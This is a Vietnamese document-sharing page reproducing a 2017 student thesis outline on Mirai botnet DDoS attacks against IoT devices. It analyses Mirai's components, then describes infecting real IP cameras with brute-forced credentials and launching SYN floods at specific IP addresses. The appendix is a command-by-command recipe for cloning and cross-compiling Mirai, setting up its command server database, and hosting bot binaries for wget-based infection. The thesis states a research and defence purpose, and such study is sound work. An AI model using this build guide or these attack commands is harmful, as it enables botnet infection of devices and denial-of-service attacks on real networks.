1. Trang chủ
  2. » Luận Văn - Báo Cáo

Đề cương đồ án tốt nghiệp: Nghiên cứu tấn công DDOS với Botnet Mirai trên các thiết bị Internet of things ( IoT )

53 311 1

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 53
Dung lượng 5,06 MB

Nội dung

Mục tiêu của đồ án: Xây dựng hệ thống botnet, nghiên cứu cách thức hoạt động của hệ thống botnet, tìm hiểu một số kỹ thuật coding thú vị trong mã nguồn, lây nhiễm mã độc lên thiết bị thật và thực nghiệm tấn công DDoS, nghiên cứu phát triển những hạn chế của mã nguồn. Mời các bạn cùng tham khảo.

BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CÔNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Công nghệ thông tin Chun ngành: An tồn thơng tin Mã số: 52.48.02.01 Hà Nội, 2017 BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CÔNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Cơng nghệ thơng tin Chun ngành: An tồn thơng tin Mã số: 52.48.02.01 Sinh viên thực hiện: Nguyễn Thế Đạt Lớp: AT9A Người hướng dẫn : KS Nguyễn Mạnh Thắng Khoa An tồn thơng tin – Học viện Kỹ thuật mật mã Mọi đóng góp trao đổi liên hệ: SĐT: 01699960595 0949423894 Mail: datnt2308@gmail.com Hà Nội, 2017 MỤC LỤC Danh mục kí hiệu viết tắt Danh mục hình vẽ Danh mục bảng Lời nói đầu Chương Tổng quan internet of things 1.1 Lịch sử hình thành phát triển Internet 1.2 Giới thiệt Internet of Things Chương Tổng quan công từ chối dịch vụ ddos 2.1 Tổng quan an ninh mạng 2.2 Tổng quan công từ chối dịch vụ Chương Nghiên cứu mã nguồn botnet mirai 3.1 Giới thiệu Botnet Mirai 3.2 Phân tích thành phần Botnet Mirai Chương Triển khai thực nghiệm botnet mirai trÊn cÁc thiết bị iot 4.1 Mô tả thực nghiệm 4.2 Thử nghiệm công Kết luận Tài liệu tham khảo Phụ lục DANH MỤC KÍ HIỆU VÀ VIẾT TẮT || Hoặc & Và Admin Administrator ARPANET Advanced Research Projects Agency Network CNC Command And Control DDoS Distributed Denial of Service IP Internet Protocol IoT Internet of Things LAN Local Area Metwork NII National Information Infrastructure NSF National Science Foundation MILNET Military Network TCP/IP Transmission Control Protocol/Internet Protocol DANH MỤC HÌNH VẼ Hình 1.1 Xu hướng phát triển IoT Hình 3.2 Mirai sử dụng user-agent khác (mirai/bot/table.h) Hình 3.3 Mirai sử dụng 10 kỹ thuật công từ chối dịch vụ (mirai/bot/attack.h) Hình 3.4 Mơ hình hoạt động logic thành phần Hình 3.5 Cấu trúc thư mục mã nguồn Hình 3.6 CNC lắng nghe kết nối (mirai/cnc/main.go) Hình 3.7 CNC nhận thơng tin bot admin (mirai/cnc/main.go) Hình 3.8 Nhập username từ cmd Hình 3.9 Nhập password từ cmd Hình 3.10 Nhập password từ cmd Hình 3.11 Thơng báo đăng nhập thành cơng Hình 3.12 Kiểm tra số lượng Bot connect tới CNC Hình 3.13 Thêm cấu hình cho tài khoản Hình 3.14 Hàm AttackInfoLookup Hình 3.15 Thiết lập network card cho report server (loader/main.c) Hình 3.16 Khởi tạo server chứa mã độc (loader/main.c) Hình 3.17 Nhận ip, port, user, pass từ STDIN (loader/main.c) Hình 3.18 Sử dụng busybox login lây mã độc (loader/server.c) Hình 3.19 Lắng nghe kết nối cổng 48101 (scanListen.go) Hình 3.20 Hiển thị thơng tin thiết bị bruteforce (scanListen.go) Hình 3.21 Che dấu tiến trình (mirai/bot/main.c) Hình 3.22 Các phương thức cơng (mirai/bot/attack.c) Hình 3.23 Kill cổng dịch vụ (mirai/bot/killer.c) Hình 3.24 Ngăn cản thiết bị reboot lại (mirai/bot/main.c) Hình 3.25 Tài khoản dùng để bruteforce IoT (mirai/bot/scanner.c) Hình 3.26 Địa bruteforce thiết bị IoT (mirai/bot/scanner.c) Hình 3.27 Bot gửi thơng tin IoT bruteforce (mirai/bot/scanner.c) Hình 3.28 Khai báo domain port server (mirai/bot/table.c) Hình 4.29 Khởi chạy CNC Server Hình 4.30 Cài đặt thơng tin Database (cnc\main.c) Hình 4.31 CNC đăng nhập Database (cnc\database.go) Hình 4.32 Khởi chạy scanListen Hình 4.33 Mở port 48101 chờ kết từ Bot Hình 4.34 Nhập Bot cho Loader Hình 4.35 Loader kết nối thiết bị IoT lây nhiễm Malware Hình 4.36 Loader thực lây lan Malware Hình 4.37 Attacker telnet tới CNC Hình 4.38 Attacker đăng nhập CNC Hình 4.39 Kiểm tra kết nối tới cổng 23 Bot hay Admin (cnc/main.go) Hình 4.40 Loader hiển thị Bot kết nối thành cơng Hình 4.41 Thơng tin Bot scan thiết bị khác Hình 4.42 Thơng tin thiết bị mà Bot bruteforce thành cơng Hình 4.43 Nhập lệnh công Hình 4.44 Lệnh hacker dùng cơng Hình 4.45 Thiết bị IoT IP Camera bị chiếm quyền kiểm sốt Hình 4.46 Victim bị Attacker cơng khiến lưu lượng tăng cao DANH MỤC BẢNG Bảng Thành phần thực nghiệm LỜI NÓI ĐẦU Internet of Things cụm từ nhằm để đối tượng nhận biết tồn chúng Kenvin Ashton đưa năm 1999 Cho đến nay, mạng lưới vạn vật kết nối Internet kịch giới đại mà đồ vật, người cung cấp định danh riêng tất có khả truyền tải, trao đổi thông tin qua mạng mà không cần tương tác trực tiếp người với người hay người với máy tính Tóm lại, IoT tập hợp thiết bị có khả kết nối với nhau, với Internet với giới bên ngồi để thực cơng việc Trong bối cảnh IoT bùng nổ xu hướng tương lai kèm với tiện ích tiềm ẩn mối nguy hại trở thành mục tiêu hàng đầu giới Hacker đại IoT gây ảnh hưởng xấu thiết bị bảo mật bị nhiễm mã độc trở thành zombie mạng botnet Khi hacker điều khiển lượng lớn thiết bị IoT dễ dàng cơng DDoS đánh sập thứ Internet với lượng liệu khổng lồ Cuối năm 2016, mã nguồn Mirai công bố gây ảnh hướng lớn kèm theo mối lo lời cảnh báo với sản phẩm IoT tương lai Vì đề tài chọn thực đồ án tốt nghiệp "Nghiên cứu công DDoS với botnet Mirai thiết bị Internet of Things (IoT)" Đồ án thực nhằm mục đích nghiên cứu cách thức hoạt động mối nguy hiểm mã nguồn botnet Mirai thiết bị IoT để từ đưa giải pháp phòng chống Mục tiêu đặt thực đồ án là: Xây dựng hệ thống botnet Nghiên cứu cách thức hoạt động hệ thống botnet Tìm hiểu số kỹ thuật coding thú vị mã nguồn Lây nhiễm mã độc lên thiết bị thật thực nghiệm công DDoS Nghiên cứu phát triển hạn chế mã nguồn Sau thời gian khoảng bốn tháng thực đồ án, mục tiêu đạt Tuy nhiên công DDoS IoT lĩnh vực khoa học phức tạp, thời gian thực đồ án tương đối ngắn nên chắn khơng tránh khỏi thiếu sót Rất mong góp ý thầy cơ, bạn học viên để đồ án hoàn thiện CHƯƠNG TỔNG QUAN VỀ INTERNET OF THINGS 1.1 Lịch sử hình thành phát triển Internet Internet sinh mạng phát triển cho mục đích qn Mạng có tên ARPANET phát triển để thử nghiệm nghiên cứu quan dự án nghiên cứu nâng cao Bộ quốc phòng Mỹ (DARPA) vào năm 1969 nguồn gốc sinh Internet Vào thời đó, hệ thống máy tính chủ yếu hệ thống máy chủ trung tâm bị coi mong manh cơng tên lửa, cơng phá hủy thông tin Do vậy, ARPANET xây dựng thành dự án nghiên cứu để phân bổ thơng tin hệ thống máy tính Ban đầu, với tốc độ truyền thấp 56 kbps hệ thống tạo nên viện nghiên cứu trường đại học Mỹ kết nối mạng gói Sau phát triển cơng nghệ tạo khả làm cho ARPANET đóng vai trò trung tâm mạng truyền thơng gần 20 năm sau Giao thức truyền thông TCP/IP công nghệ tảng mà bỏ qua bạn nói phát triển Internet Bởi DARPA sử dụng TCP/IP giao thức chuẩn cho ARPANET, từ TCP/IP phát triển thành giao thức chuẩn Internet Rất nhiều đầu tư nghiên cứu phát triển công nghệ mạng LAN thực vào năm 1970 đóng góp nhiều vào phát triển Internet Vào năm 1983, phần mạng ARPANET phục vụ chủ yếu cho mục đích quân cắt bỏ (phần có tên MILNET (MILitary NETwork) phần lại mạng chuyển thành mạng phục vụ cho khoa học nghiên cứu TCP/IP chấp nhận giao thức truyền thơng vào thời điểm Quĩ khoa học quốc gia Hoa Kỳ (NSF) xây dựng vận hành hệ thống mạng độc lập có tên NSFNET vào năm 1986 Sau đó, NSFNET ARPANET liên nối để hình thành nên mẫu Internet giới (NSFNET hấp thu ARPANET vào năm 1990) Một yếu tố thiếu phát triển Internet thiết lập sở hạ tầng truyền thông tin Một người nhận tầm quan trọng việc xây dựng sở hạ tầng truyền thông phó tổng thống Mỹ đó, ơng Al Gore, người đưa kế hoạch NII (kết cấu thông tin quốc gia) vào năm 1993 Kế hoạch tập trung vào việc nghiên cứu phát triển mạng siêu nhanh (cấp độ Gbps) việc tồn cầu hố làm lẩy cò việc xây dựng kết cấu truyền thông tin Đến nay, máy tính cá nhân hỗ trợ giao thức TCP/IP, có lực xử lý cao đắt hơn, dẫn tới thực trạng công chúng dễ dàng kết nối Internet cách sử dụng máy tính cá nhân bình thường Điều khiến cho việc sử dụng Internet trở nên phổ biến công chúng 1.2 Giới thiệt Internet of Things 1.2.1 Xu hướng phát triển Với phát triển Internet, smartphone đặc biệt thiết bị cảm biến, Internet of Things trở thành xu hướng giới Internet of Things định nghĩa vật dụng có khả kết nối Internet Ý tưởng nhà thông minh vào nhà, mở khóa cửa, đèn tự động sáng chỗ đứng, điều hòa tự động điều chỉnh nhiệt độ, nhạc tự động bật để chào đón…những điều có phim khoa học viễn tưởng, dần trở thành thực với cơng nghệ Internet of Things Hình 1.1 Xu hướng phát triển IoT Ý tưởng an toàn giao thơng thực hóa giải pháp mạng cảm biến phương tiện Mạng cảm biến phương tiện tạo nên nhiều phương tiện có tính giao tiếp V2V để giúp truyền nhận thông tin để phương tiện khác nhận biết dự đốn tình chưa xảy Sau đó, trí tuệ nhân tạo mà phương tiện tự điều khiển cảnh báo cho người dùng 10 Hình 4.38 Attacker đăng nhập CNC IP Attacker: 14.177.140.96 IP CNC: 203.162.130.69 Attacker telnet đăng nhập CNC Attacker sử dụng user/pass hacker/hacker đăng nhập công Sau follow tcp ta thấy string tương ứng với tài khoản đăng nhập hacker/hacker thông tin số lượng Bot connect tới CNC Phân tích source code: 39 Hình 4.39 Kiểm tra kết nối tới cổng 23 Bot hay Admin (cnc/main.go) Dòng 66: Nếu nhận bytes \x00\x00\x00\x01 => Bot connect CNC Ngược lại, Admin connect CNC Bước Kiểm tra trạng thái Loader Server, Bot, Report Server Kiểm tra trạng thái Loader Server, Bot, Report Server sau lây nhiễm Malware Loader Server: 40 Hình 4.40 Loader hiển thị Bot kết nối thành cơng Như Bot có IP 61.222.7.176, port 23, tài khoản admin/1111, kiến trúc arm7 Và đặc biệt Bot có tiện ích Busybox sử dụng lệnh Wget Wget nói từ trước giúp thiết bị tải Malware từ Wget Server Bot: 41 Hình 4.41 Thơng tin Bot scan thiết bị khác Ngay sau lây nhiễm Malware vào thiết bị Bot sẽ:  Tự kill tiến trình mở port 23 Bot nhằm khơng cho truy cập vào thiết bị qua port 23  Phân giải tên miền CNC 42  Kết nối tới CNC  Tự động bruteforce thiết bị khác đồng thời giữ kết nối với CNC  Gửi kết cho Report Server Report Server: Hình 4.42 Thơng tin thiết bị mà Bot bruteforce thành công Hiển thị thông tin thiết bị mà Bot bruteforce thành công Lưu ý: Source code Mirai, Bot dừng mức bruteforce mà chưa kiểm tra điều kiện để lây Malware thiết bị nên việc hồn tồn khơng có nghĩa thiết bị phù hợp để lây Bot Loader server nơi kiểm tra điều kiện lây Malware scanListen Cần phân biệt điều này, điều kiện cần chưa đủ Bước Attacker cơng Victim Bước có nhiệm vụ: Hiển thị thông tin user đăng nhập số lượng Bot attack Nhập lệnh attack Gửi lệnh tới CNC Nhập lệnh công theo định dạng : [Flags] Ví dụ: syn 203.162.130.66 30 psh==1 syn 203.162.130.66 3600 ack==1 43 Hình 4.43 Nhập lệnh công Lệnh Attacker gửi gửi sau: Attacker nhập lệnh công qua CMD -> CNC -> Bot -> Victim Hình 4.44 Lệnh hacker dùng công IP Attacker: 14.177.140.96 IP CNC: 203.162.130.69 IP Victim: 203.162.130.87 Command: syn 203.162.130.87 20 psh==1 Attacker cơng Victim Syn Flood có Flag Push vòng 20s 44 Bước Kiểm tra kết Hình 4.45 Thiết bị IoT IP Camera bị chiếm quyền kiểm sốt Hình 4.46 Victim bị Attacker cơng khiến lưu lượng tăng cao Bot liên tục gửi gói tin cơng Victim vòng 20s Tuy nhiên, số lượng gói tin Victim phải hứng chịu lớn 45 KẾT LUẬN Bốn chương đồ án thể mục tiêu đặt thực đồ án đạt Cụ thể: Chương giới thiệu tổng quan Internet of Things Chương với xu hướng ứng dụng thực tiễn IoT tồn mối nguy hiểm tiềm ẩn Trong đó, mối nguy hiểm lớn hot Botnet IoT Chương nối tiếp chương nói cụ thể nguy hiểm công từ chối dịch vụ xu hướng sử dụng Botnet IoT vào công DDoS kim nam cho công mạng mà hacker đương đại nhắm đến Chương xem xét thành phần cấu trúc mã nguồn Mirai Đồng thời cụ thể hóa kỹ thuật ý tưởng xây dựng Botnet Mirai tác giả thơng qua phân tích đoạn mã Theo đó, phân tích nhược điểm thiếu sót mã nguồn Những nhược điểm lộ rõ em triển khai khắc phục Trong chương 4, thực nghiệm mô tả trình xây dựng thực tế hệ thống thiết bị thật Mơ hình triển khai cụ thể hóa thành phần mã nguồn, cách chúng kết hợp tương tác Từ đó, hiểu rõ hệ thống Botnet Mirai nói riêng hệ thống Botnet giới nói chung Dù vậy, số vấn đề liên quan Trước hết, đồ án đề cập đến việc sử dụng bruteforce mà chưa sâu vào việc ứng dụng lỗ hổng zero-day, CVE công bố để khai thác thiết bị IoT chưa đủ thời gian để nghiên cứu thêm Mã nguồn tác giả có số thiếu sót việc biên dịch sang x86 dẫn đến lỗi chạy tảng Dù em cố gắng chỉnh sửa biên dịch lại chưa thành công Việc giải điểm tồn hướng phát triển tương lai đồ án 46 TÀI LIỆU THAM KHẢO [1] GSM Accociation, IoT Security Guidelines Overview Document Version 1.1, November 07, 2016 [2] Mirai DDoS Botnet: Source Code & Binary Analysis, http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binaryanalysis/ [3] Octave Klaba, This botnet with 145607 cameras/dvr (1-30Mbps per IP) is able to send >1.5Tbps DDoS Type: tcp/ack, tcp/ack+psh, tcp/syn.“ [4] Brian Krebs; Krebs on Security, 1.10.2016: „Source Code for IoT Botnet ‘Mirai’ Released“: https://krebsonsecurity.com/2016/10/source-code-for-iotbotnet-mirai-released/ [5] Word’s Largest Net: Mirai Botnet, https://hackforums.net/showthread.php? tid=5420472 47 PHỤ LỤC Các bước cài đặt hệ thống Botnet Mirai: #Update Sources.list in /etc/apt/sources.list deb http://http.kali.org/kali kali-rolling main contrib non-free deb-src http://http.kali.org/kali kali-rolling main contrib non-free deb http://old.kali.org/kali sana main non-free contrib deb-src http://old.kali.org/kali sana main non-free contrib #Update Repo apt-get update #Requirements apt-get install gcc golang electric-fence mysql-server mysql-client #Git Clone Mirai Source Code cd /home/mirai mkdir ddos/ cd ddos/ apt-get install git git clone https://github.com/jgamblin/Mirai-Source-Code.git cd Mirai-Source-Code/mirai export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go go get github.com/go-sql-driver/mysql go get github.com/mattn/go-shellwords mkdir /etc/xcompile cd /etc/xcompile wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilerarmv4l.tar.bz2 wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compilerarmv5l.tar.bz2 wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compilerarmv6l.tar.bz2 48 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compileri586.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilerm68k.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilermips.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilermipsel.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilerpowerpc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compilersparc.tar.bz2 tar -jxf cross-compiler-armv4l.tar.bz2 tar -jxf cross-compiler-armv5l.tar.bz2 tar -jxf cross-compiler-armv6l.tar.bz2 tar -jxf cross-compiler-i586.tar.bz2 tar -jxf cross-compiler-m68k.tar.bz2 tar -jxf cross-compiler-mips.tar.bz2 tar -jxf cross-compiler-mipsel.tar.bz2 tar -jxf cross-compiler-powerpc.tar.bz2 tar -jxf cross-compiler-sh4.tar.bz2 tar -jxf cross-compiler-sparc.tar.bz2 rm *.tar.bz2 mv cross-compiler-armv4l armv4l mv cross-compiler-armv5l armv5l mv cross-compiler-armv6l armv6l mv cross-compiler-i586 i586 mv cross-compiler-m68k m68k mv cross-compiler-mips mips mv cross-compiler-mipsel mipsel mv cross-compiler-powerpc powerpc mv cross-compiler-sh4 sh4 49 mv cross-compiler-sparc sparc # PUT THESE COMMANDS IN THE FILE ~/.bashrc # Cross compiler toolchains export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin # Golang export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go cd /home/mirai/ddos/Mirai-Source-Code/mirai /build.sh debug telnet /build.sh debug telnet /debug/enc string edit file bot/table.c vi bot/table.c service mysql start mysql -u root CREATE DATABASE mirai; use mirai; CREATE TABLE `history` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id` int(10) unsigned NOT NULL, `time_sent` int(10) unsigned NOT NULL, 50 `duration` int(10) unsigned NOT NULL, `command` text NOT NULL, `max_bots` int(11) DEFAULT '-1', PRIMARY KEY (`id`), KEY `user_id` (`user_id`) ); CREATE TABLE `users` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `username` varchar(32) NOT NULL, `password` varchar(32) NOT NULL, `duration_limit` int(10) unsigned DEFAULT NULL, `cooldown` int(10) unsigned NOT NULL, `wrc` int(10) unsigned DEFAULT NULL, `last_paid` int(10) unsigned NOT NULL, `max_bots` int(11) DEFAULT '-1', `admin` int(10) unsigned DEFAULT '0', `intvl` int(10) unsigned DEFAULT '30', `api_key` text, PRIMARY KEY (`id`), KEY `username` (`username`) ); CREATE TABLE `whitelist` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `prefix` varchar(16) DEFAULT NULL, `netmask` tinyint(3) unsigned DEFAULT NULL, PRIMARY KEY (`id`), KEY `prefix` (`prefix`) ); exit mysqladmin -u root password root mysql -u root -p //dang nhap password mysql : root GRANT ALL ON mirai.* TO 'root'@'127.0.0.1'; GRANT ALL ON mirai.* TO 'root'@'localhost'; use mirai; INSERT INTO users VALUES (NULL, 'hacker', 'hacker', 0, 0, 0, 0, -1, 1, 30, ''); 51 exit cd cnc/ leafpad main.go password database : root port 3306 cd copy file prom.pt vao cnc export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin # Golang export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go go get github.com/go-sql-driver/mysql go get github.com/mattn/go-shellwords /build.sh debug telnet /build.sh release telnet #dlr cd /home/mirai/ddos/Mirai-Source-Code/dlr edit main.c => IP HTTP Server comment /build.sh: line 3: i686-gcc: command not found /build.sh: line 16: i686-strip: command not found #DLR build # apt-get update && apt-get upgrade 52 apt-get install build-essential Replace i686-gcc with gcc, i686-strip with strip and try again /build.sh copy dlr vao bin cua loader chmod 777 build.sh export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin /build.sh cd release/ cp * / /loader/bins/ cd / /loader/src/ leafpad main.c #edit tftp,wget,bind address cd ./build.debug.sh /build.sh mkdir /var/www/html/bins cd /home/mirai/ddos/Mirai-Source-Code/mirai/ cp -R release/mirai.* /var/www/html/bins cp -R release/miraint.* /var/www/html/bins cp prompt.txt release/ cd release/ /cnc 53 ... VIỆN KỸ THUẬT MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CÔNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Công nghệ thông tin Chun ngành: An tồn... nguồn Mirai công bố gây ảnh hướng lớn kèm theo mối lo lời cảnh báo với sản phẩm IoT tương lai Vì đề tài chọn thực đồ án tốt nghiệp "Nghiên cứu công DDoS với botnet Mirai thiết bị Internet of Things. .. (IoT) " Đồ án thực nhằm mục đích nghiên cứu cách thức hoạt động mối nguy hiểm mã nguồn botnet Mirai thiết bị IoT để từ đưa giải pháp phòng chống Mục tiêu đặt thực đồ án là: Xây dựng hệ thống botnet

Ngày đăng: 30/12/2019, 14:43

Nguồn tham khảo

Tài liệu tham khảo Loại Chi tiết
[2]. Mirai DDoS Botnet: Source Code & Binary Analysis,http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ Sách, tạp chí
Tiêu đề: Mirai DDoS Botnet: Source Code & Binary Analysis
[5]. Word’s Largest Net: Mirai Botnet, https://hackforums.net/showthread.php?tid=5420472 Sách, tạp chí
Tiêu đề: Word’s Largest Net: Mirai Botnet
[4]. Brian Krebs; Krebs on Security, 1.10.2016: „Source Code for IoT Botnet ‘Mirai’ Released“: https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/ Link
[1]. GSM Accociation, IoT Security Guidelines Overview Document Version 1.1, November 07, 2016 Khác
[3]. Octave Klaba, This botnet with 145607 cameras/dvr (1-30Mbps per IP) is able to send >1.5Tbps DDoS. Type: tcp/ack, tcp/ack+psh, tcp/syn.“ Khác

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w